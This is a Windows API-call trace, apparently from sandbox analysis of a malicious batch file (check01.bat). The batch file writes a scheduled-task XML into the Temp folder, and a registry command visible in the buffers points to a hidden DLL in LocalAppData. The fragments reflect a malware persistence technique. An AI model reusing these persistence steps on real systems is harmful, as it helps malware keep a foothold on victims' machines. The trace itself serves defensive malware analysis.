[0378.579] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x914
[0378.579] GetProcessHeap () returned 0x200000
[0378.579] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x2353d0
[0378.580] GetProcessHeap () returned 0x200000
[0378.580] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2393f0
[0378.580] GetProcessHeap () returned 0x200000
[0378.580] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0378.580] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0378.580] GetProcessHeap () returned 0x200000
[0378.580] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.580] GetProcessHeap () returned 0x200000
[0378.580] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2393f0 | out: hHeap=0x200000) returned 1
[0378.581] GetProcessHeap () returned 0x200000
[0378.581] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2353d0 | out: hHeap=0x200000) returned 1
[0378.581] _tell (_FileHandle=3) returned 2324
[0378.581] _close (_FileHandle=3) returned 0
[0378.582] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0378.582] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0378.582] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0378.582] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0378.582] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0378.582] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0378.582] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0378.582] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0378.582] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0378.582] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0378.582] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.582] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.582] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.582] GetFileType (hFile=0x7) returned 0x2
[0378.583] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0378.583] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0378.584] _dup (_FileHandle=1) returned 3
[0378.585] _close (_FileHandle=1) returned 0
[0378.586] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0378.586] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.586] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0378.586] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.586] GetFileType (hFile=0x64) returned 0x1
[0378.586] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x432
[0378.586] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x431
[0378.587] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0378.587] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0378.587] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x220470, Size=0x72) returned 0x220470
[0378.587] GetProcessHeap () returned 0x200000
[0378.587] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x220470) returned 0x72
[0378.587] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer="PT0S \r\n") returned 48
[0378.588] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.588] GetFileType (hFile=0x64) returned 0x1
[0378.588] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.588] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="PT0S \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PT0S \r\n", lpUsedDefaultChar=0x0) returned 49
[0378.588] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0x30, lpOverlapped=0x0) returned 1
[0378.588] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0378.590] _close (_FileHandle=3) returned 0
[0378.591] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.591] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0378.592] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.592] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0378.592] _get_osfhandle (_FileHandle=0) returned 0x3
[0378.592] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0378.595] SetConsoleInputExeNameW () returned 0x1
[0378.595] GetConsoleOutputCP () returned 0x1b5
[0378.596] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0378.596] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0378.598] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.598] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0378.598] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.598] SetFilePointer (in: hFile=0x64, lDistanceToMove=2324, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x914
[0378.598] GetProcessHeap () returned 0x200000
[0378.599] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x231400 | out: hHeap=0x200000) returned 1
[0378.599] GetProcessHeap () returned 0x200000
[0378.599] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x220470 | out: hHeap=0x200000) returned 1
[0378.599] GetProcessHeap () returned 0x200000
[0378.599] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0378.599] GetProcessHeap () returned 0x200000
[0378.599] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0378.599] GetProcessHeap () returned 0x200000
[0378.600] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0378.600] GetProcessHeap () returned 0x200000
[0378.600] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x233400 | out: hHeap=0x200000) returned 1
[0378.600] GetProcessHeap () returned 0x200000
[0378.600] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.600] GetProcessHeap () returned 0x200000
[0378.600] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0378.600] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.601] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x914
[0378.601] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0x61e, lpOverlapped=0x0) returned 1
[0378.601] SetFilePointer (in: hFile=0x64, lDistanceToMove=2360, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x938
[0378.601] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=36, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\necutionTimeLimit^> >> %temp%\\a.xml\r\n%\\a.xml\r\n\\a.xml\r\n^> >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 36
[0378.601] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.601] GetFileType (hFile=0x64) returned 0x1
[0378.601] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.601] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x938
[0378.602] GetProcessHeap () returned 0x200000
[0378.602] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x2373d0
[0378.602] GetProcessHeap () returned 0x200000
[0378.602] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x23b3f0
[0378.602] GetProcessHeap () returned 0x200000
[0378.602] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0378.602] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0378.602] GetProcessHeap () returned 0x200000
[0378.602] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.602] GetProcessHeap () returned 0x200000
[0378.603] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x23b3f0 | out: hHeap=0x200000) returned 1
[0378.603] GetProcessHeap () returned 0x200000
[0378.603] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2373d0 | out: hHeap=0x200000) returned 1
[0378.604] _tell (_FileHandle=3) returned 2360
[0378.604] _close (_FileHandle=3) returned 0
[0378.604] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0378.604] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0378.605] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0378.605] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0378.605] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0378.605] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0378.605] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0378.605] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0378.605] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0378.605] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0378.605] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.605] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.605] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.606] GetFileType (hFile=0x7) returned 0x2
[0378.606] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0378.607] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0378.608] _dup (_FileHandle=1) returned 3
[0378.615] _close (_FileHandle=1) returned 0
[0378.616] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0378.616] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.617] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0378.617] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.617] GetFileType (hFile=0x64) returned 0x1
[0378.617] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x462
[0378.617] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x461
[0378.617] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0378.618] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0378.618] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x228690, Size=0x2e) returned 0x216db0
[0378.618] GetProcessHeap () returned 0x200000
[0378.619] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x216db0) returned 0x2e
[0378.619] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer=" \r\n") returned 14
[0378.619] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.619] GetFileType (hFile=0x64) returned 0x1
[0378.619] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.619] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \r\n", lpUsedDefaultChar=0x0) returned 15
[0378.619] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0xe, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0xe, lpOverlapped=0x0) returned 1
[0378.620] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0378.622] _close (_FileHandle=3) returned 0
[0378.623] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.623] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0378.626] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.626] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0378.627] _get_osfhandle (_FileHandle=0) returned 0x3
[0378.627] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0378.628] SetConsoleInputExeNameW () returned 0x1
[0378.628] GetConsoleOutputCP () returned 0x1b5
[0378.628] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0378.628] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0378.629] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.629] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0378.629] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.629] SetFilePointer (in: hFile=0x64, lDistanceToMove=2360, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x938
[0378.629] GetProcessHeap () returned 0x200000
[0378.629] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216df0 | out: hHeap=0x200000) returned 1
[0378.629] GetProcessHeap () returned 0x200000
[0378.630] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216db0 | out: hHeap=0x200000) returned 1
[0378.630] GetProcessHeap () returned 0x200000
[0378.630] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0378.630] GetProcessHeap () returned 0x200000
[0378.630] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0378.630] GetProcessHeap () returned 0x200000
[0378.630] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d70 | out: hHeap=0x200000) returned 1
[0378.630] GetProcessHeap () returned 0x200000
[0378.630] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0378.631] GetProcessHeap () returned 0x200000
[0378.631] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.631] GetProcessHeap () returned 0x200000
[0378.631] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x235400 | out: hHeap=0x200000) returned 1
[0378.631] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.631] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x938
[0378.632] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0x5fa, lpOverlapped=0x0) returned 1
[0378.632] SetFilePointer (in: hFile=0x64, lDistanceToMove=2415, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x96f
[0378.632] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=55, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\n>> %temp%\\a.xml\r\n%\\a.xml\r\n\\a.xml\r\n^> >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 55
[0378.632] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.632] GetFileType (hFile=0x64) returned 0x1
[0378.632] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.632] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x96f
[0378.632] GetProcessHeap () returned 0x200000
[0378.632] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x2373d0
[0378.633] GetProcessHeap () returned 0x200000
[0378.633] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x23b3f0
[0378.633] GetProcessHeap () returned 0x200000
[0378.633] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x22) returned 0x21b0c0
[0378.633] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x9
[0378.633] GetProcessHeap () returned 0x200000
[0378.633] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.633] GetProcessHeap () returned 0x200000
[0378.634] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x23b3f0 | out: hHeap=0x200000) returned 1
[0378.634] GetProcessHeap () returned 0x200000
[0378.634] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x23b3f0
[0378.634] GetProcessHeap () returned 0x200000
[0378.634] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0378.634] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0378.634] GetProcessHeap () returned 0x200000
[0378.634] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.634] GetProcessHeap () returned 0x200000
[0378.635] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x23b3f0 | out: hHeap=0x200000) returned 1
[0378.635] GetProcessHeap () returned 0x200000
[0378.635] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2373d0 | out: hHeap=0x200000) returned 1
[0378.636] _tell (_FileHandle=3) returned 2415
[0378.636] _close (_FileHandle=3) returned 0
[0378.636] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0378.636] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0378.636] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0378.636] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0378.636] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0378.636] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0378.636] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0378.637] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0378.637] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0378.637] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0378.637] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.637] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.637] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.637] GetFileType (hFile=0x7) returned 0x2
[0378.638] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0378.638] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0378.638] _dup (_FileHandle=1) returned 3
[0378.644] _close (_FileHandle=1) returned 0
[0378.645] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0378.645] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.645] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0378.645] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.645] GetFileType (hFile=0x64) returned 0x1
[0378.645] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x470
[0378.645] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x46f
[0378.646] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0378.646] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0378.646] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21cbf0, Size=0x4e) returned 0x21cbf0
[0378.646] GetProcessHeap () returned 0x200000
[0378.646] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21cbf0) returned 0x4e
[0378.646] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer=" \r\n") returned 32
[0378.647] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.647] GetFileType (hFile=0x64) returned 0x1
[0378.647] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.647] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \r\n", lpUsedDefaultChar=0x0) returned 33
[0378.647] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0x20, lpOverlapped=0x0) returned 1
[0378.647] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0378.650] _close (_FileHandle=3) returned 0
[0378.652] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.652] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0378.654] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.654] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0378.655] _get_osfhandle (_FileHandle=0) returned 0x3
[0378.655] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0378.656] SetConsoleInputExeNameW () returned 0x1
[0378.657] GetConsoleOutputCP () returned 0x1b5
[0378.657] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0378.657] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0378.658] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.659] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0378.659] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.659] SetFilePointer (in: hFile=0x64, lDistanceToMove=2415, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x96f
[0378.659] GetProcessHeap () returned 0x200000
[0378.659] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201de0 | out: hHeap=0x200000) returned 1
[0378.660] GetProcessHeap () returned 0x200000
[0378.660] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0378.660] GetProcessHeap () returned 0x200000
[0378.660] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0378.661] GetProcessHeap () returned 0x200000
[0378.661] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0378.661] GetProcessHeap () returned 0x200000
[0378.661] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0378.661] GetProcessHeap () returned 0x200000
[0378.661] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21f4a0 | out: hHeap=0x200000) returned 1
[0378.661] GetProcessHeap () returned 0x200000
[0378.661] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.661] GetProcessHeap () returned 0x200000
[0378.662] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x235400 | out: hHeap=0x200000) returned 1
[0378.662] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.662] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x96f
[0378.663] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0x5c3, lpOverlapped=0x0) returned 1
